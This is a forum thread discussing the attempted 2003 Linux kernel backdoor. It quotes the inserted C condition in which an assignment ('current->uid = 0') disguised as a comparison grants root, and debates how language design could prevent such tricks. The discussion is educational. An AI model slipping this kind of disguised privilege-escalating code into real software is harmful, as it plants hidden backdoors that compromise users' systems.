Linux security: mixing assignment with expression

D

Dave Benjamin

Hey folks,

I was just reading about the attempt to insert a backdoor into the Linux
kernel. You can read the details here:

http://kerneltrap.org/node/view/1584

This is the code that the attacker inserted:

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;

Notice the "current->uid = 0" expression? I think it's pretty clear that the
intent was to confuse the reader, to make the above code appear like it's
doing a comparison, when actually it is assigning 0 to the user ID (0 being
the root user).

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".
 
J

Jay O'Connor

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".
Click to expand...

I still prefer the solutions from other languages that use real
boolean types and then either don't allow boolean evaluation of
numbers (Smalltalk) or don't allow assignment of numbers to booleans
(Ada)
 
D

Dave Benjamin

I still prefer the solutions from other languages that use real
boolean types and then either don't allow boolean evaluation of
numbers (Smalltalk) or don't allow assignment of numbers to booleans
(Ada)
Click to expand...

This still wouldn't be sufficient to prevent the following (admittedly
contrived) example:

if foo in [BAR, BAZ] and (admin_priveleges = True):
return oof

As far as the boolean evaluation issue is concerned, it's a tradeoff between
convenience and clarity sometimes. It's nice to treat an empty list as a
false value:

if items_left:
item = items_left.pop()
diddle(item)

But maybe we're back to the ol' implicit/explicit argument.

Smalltalk is particularly unusual in how it handles booleans. In Python
syntax, it would have to be something like:

Boolean(len(items_left == 0)).ifTrue(lambda: diddle(items_left.pop()))
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Assigning an array to another array using C's assignment operator 0
Assigning an array to another array using C's assignment operator 13
Assigning an array to another array using C's assignment operator 0
Assigning an array to another array using C's assignment operator 1
The undefinedness of a common expression. 99
Security Gotcha with $: 1
How do I use a variable or parameter in an <xsl:if> expression to compare it with the value of an xm 2
Available Java, Dot net and SAP SD CRM consultants with us...................... 2

Members online

No members online now.
Total: 29 (members: 0, guests: 29)
Robots: 332

Forum statistics

Threads
473,755
Messages
2,569,537
Members
45,022
Latest member
MaybelleMa

Latest Threads

Top